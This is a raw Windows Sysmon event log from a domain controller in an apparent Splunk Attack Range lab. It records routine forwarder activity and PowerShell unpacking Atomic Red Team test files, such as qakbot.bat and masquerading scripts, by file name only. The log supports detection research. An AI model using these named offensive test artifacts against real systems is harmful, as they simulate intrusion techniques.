21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\Tests\powershell-yaml.Tests.ps12021-06-23 21:08:13.137 11241100x800000000000000024309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\netstandard1.3\YamlDotNet.dll2021-06-23 21:08:13.137 11241100x800000000000000024308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net45\YamlDotNet.dll2021-06-23 21:08:13.137 11241100x800000000000000024307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:13.137{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\lib\net35\YamlDotNet.dll2021-06-23 21:08:13.137 23542300x800000000000000024341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:14.325{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1571A312D9EE201EA41C0CA3136C941F,SHA256=70595DDABE6DA0F3253D73C3E143E72EE632BA1AC94244A0B64661E4C36DFAFE,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000024340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.265{4DB9351A-A273-60D3-3C05-00000000CF01}6608psg-prod-eastus.azureedge.net0type: 5 psg-prod-eastus.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:15.341{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D89897C7E507FEABDB7A0CED3FFA6CA,SHA256=E9A6E5BF58B6E660AE0571660C0B8EE107EF6DE748A68B697D091BBB497A456B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:16.341{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6AA9EBCCD2B7E9E7D64BAF723C9E9EF,SHA256=1A5482CD44CDD237985B908D8D9C91724970F4B6F8B66F667484AE9479D1AC7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:17.356{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C59CDC27FE4D7E3C128E9E6CBD03790,SHA256=0E4284A788187EBA998689ADF16300E49FEB471147B2933039B4FFA6479A5901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:18.372{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC92465D3203767C9251D061E3036C1,SHA256=525DB5E5B8E3E5DDF950CDAEA90E9355DA8B12425664AD0E380C3CC21B440C34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:19.372{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84FBAD5976C889902BB130741D127EA0,SHA256=5AC3B3B7B7BC430CEE4704BEC6F46E9DA55A113F73810DE2E6B374311500A1A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:17.255{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61501-false10.0.1.12-8000- 23542300x800000000000000024348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:20.403{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5530BA78093D390CDCBFA3857C1034,SHA256=E7FB1E9EC2E134CF895DB6D7CE01F2DB520051B502AFDFA62695427D7D1DCA50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:21.403{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFEEF9156345CE1C6D6A6963435EF80,SHA256=0A81F8618D8298071C3748D3E5BF004419EC4A9773D73B57640DA3D2D9FF713C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:22.419{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBAD99B2DBD55A4DF09A0D33F450A7E6,SHA256=499ADB825EC2A938FFAB07868F069CD319183B8382E4185503046559E0FFB1F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:23.419{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9E49AAF034D5E51B2A62BABEAA8C31E,SHA256=D85AA69C0588A1C44C3875177067F1C7585D72D51ED449A5747E320717A83E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:24.419{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FF0B023970321F600EB0A61EE0A22BC,SHA256=5827094B2657DFB9A961B2105BC48A8E9BD76CA635C03D53384114006C23C382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:25.903{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=0BABC06065E0663F43862E92F5EAC65D,SHA256=E226D5FC1E92FA39DD187F879184052122AA9F9D9E1E1E072E497B1C85E5DFC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:25.434{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CD3158A8538227365E837E75DB3DB03,SHA256=3011E92A2112F967423C3658A3450CECD3B29DAE2C38C287301B6EDE316E2D31,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:23.207{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61502-false10.0.1.12-8000- 23542300x800000000000000024357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.450{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A1322DC9F8DF4745EC3CD9A77EED386,SHA256=48B780BE8AD9B638D9C097A7BCE24680A4F1F86CE115006116B9D1E7A0F2E260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.184{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=29BDC02D33BCC215D9EA00B07FD37716,SHA256=1B690E9B8968F1AA546FE13E50A1991368D6851084E6C296A304F42B8DC693EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:27.466{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE66AD28AE3D31731DE1DE9C9B227439,SHA256=0B1F7A6EE6CC2A1E03213ACAEDCDFEB5135A5CC8384BFD109C681427F72162F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:28.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BA7C73458C798FFFF19CF597B802588,SHA256=F5C649FC544CD3BD1CD4CAFC8E016D7EA0698C10D1E7B7C92CA32506893F2F13,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.167{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local58817-false10.0.1.14win-dc-663.attackrange.local53domain 354300x800000000000000024363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.167{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-663.attackrange.local53domainfalse10.0.1.14win-dc-663.attackrange.local58817- 354300x800000000000000024362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.167{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:c850:5d9d:380:ffff-58817-truea00:10e:0:0:0:0:0:0win-dc-663.attackrange.local53domain 354300x800000000000000024361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.166{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local59010- 354300x800000000000000024360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.165{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local49275- 354300x800000000000000024359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:26.165{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local49275-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domain 13241300x800000000000000024367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:29.950{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76873-0xeabd0cf7) 23542300x800000000000000024366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:29.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED2E0EDE00C6FE958DE0C91F3505ACE,SHA256=AEC4A2CBEE4F298EE49A1B19BE339A62736A8A4D335D9D142A38854DDE38999D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:30.509{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E8012FBFDFE91A3BE506016D973A1E,SHA256=B55408068C3743DEFED95108642CDD1F54F9F41194564A862B817CCEB236F7EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:31.540{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C74EE6061B6CA3321995B51AA1573898,SHA256=53BE9C516A25EE3492F43AF5B07B33A4EA07B1A0D0FF337254969954E1F84174,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:29.239{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61503-false10.0.1.12-8000- 23542300x800000000000000024371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:32.556{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C54307507EA53B7846D6C4CA17350E57,SHA256=82BF0EBAFA27C8C0A6C43E3CF75B90A04E732AB7CAAD0E4D3A9CEFBB304C73A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:33.556{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6277DD9D72EEEC346234289473729DA,SHA256=CCC8E940B8CC7AC8ED528251E986433823C0DB1BD56B98493D26FC6C5B65E765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:34.571{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB7519A5535C6E663900049BA1FBA6DB,SHA256=A49480E745C3E869529E4830E0172BA0959903619DF214A5CBAE808F816F334E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:35.603{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FA32B2E604444C2E08A41BD3AB53CB4,SHA256=A85CF8F4BE9A52B4631D81849D1966CE74F3F839EA370AE6F3A936A6616A0163,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:36.603{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA673AF4CF207946AFD0CD75A5984965,SHA256=B4E5DCA84965F6F8A9C8624045B7BDA03E4F083A45A126AE3C0F332D87A5992D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:37.618{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F066E6EDCBD996CD6B926EBAF919F7C,SHA256=12AD0874CD5186DACB3861A820EC175B16FB2BC0FDA17586B92A23BDC1E596BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:35.251{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61504-false10.0.1.12-8000- 23542300x800000000000000024378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:38.634{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3863582D24AF94734D672B0A5B15D128,SHA256=8433B4573E40BD98CCCC7E52225344BCF3B8E718CE66C1BE3C418ED51D494027,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:39.665{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\LICENSE.txt2021-06-23 21:08:39.665 23542300x800000000000000024380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:39.649{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5A3AA6137AEADA349DECDBF5EFDEE86,SHA256=3F628FCB3117A2FCD199EEA6AD9857E65A83C37EE1F50977C0E71AEE1B1738CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:39.196{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:40.869{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1EB2FBE08A84C0D349B38AE962407D85,SHA256=5A6716945C183D5A10509A3877E25E8CE15F106988B1E6B91E0169E0DFE06AEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:40.869{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07945BD3315BECE2495297A4CD4933C5,SHA256=3D95F7DFEE3C4AFB552289164D564BF2BDB161104F23CD0672ECBD5E009AF98A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:39.235{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61505-false10.0.1.12-8089- 23542300x800000000000000024391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:41.994{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DAA0179AB77A25930C93CEF345D95FDF,SHA256=8E3E9C9F942F75D18D78C7647C62620398E9D8527ACE2D6C809591178C5E4778,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:41.994{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C9166925B7456EE7B3CD40B6E70EE37,SHA256=E5534DC2D2E565A9CE9B0D86936C24F08B9E55622FF32B0216BA6E5CE0EEF82B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:41.931{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1027\src\T1027-cc-macro.xlsm2021-06-23 21:08:41.931 11241100x800000000000000024388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:41.774{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1027.004\bin\T1027.004_DynamicCompile.exe2021-06-23 21:08:41.774 11241100x800000000000000024387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:41.181{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1016\src\top-128.txt2021-06-23 21:08:41.181 11241100x800000000000000024386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:41.165{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1016\src\qakbot.bat2021-06-23 21:08:41.165 11241100x800000000000000024385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:41.024{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1014\bin\puppetstrings.exe2021-06-23 21:08:41.024 354300x800000000000000024396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:41.251{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61506-false10.0.1.12-8000- 11241100x800000000000000024395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:42.181{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\src\T1036.003_test.bat2021-06-23 21:08:42.181 11241100x800000000000000024394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:42.181{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\src\T1036.003_masquerading.vbs2021-06-23 21:08:42.165 11241100x800000000000000024393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:42.165{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1036.003\src\T1036.003_masquerading.ps12021-06-23 21:08:42.165 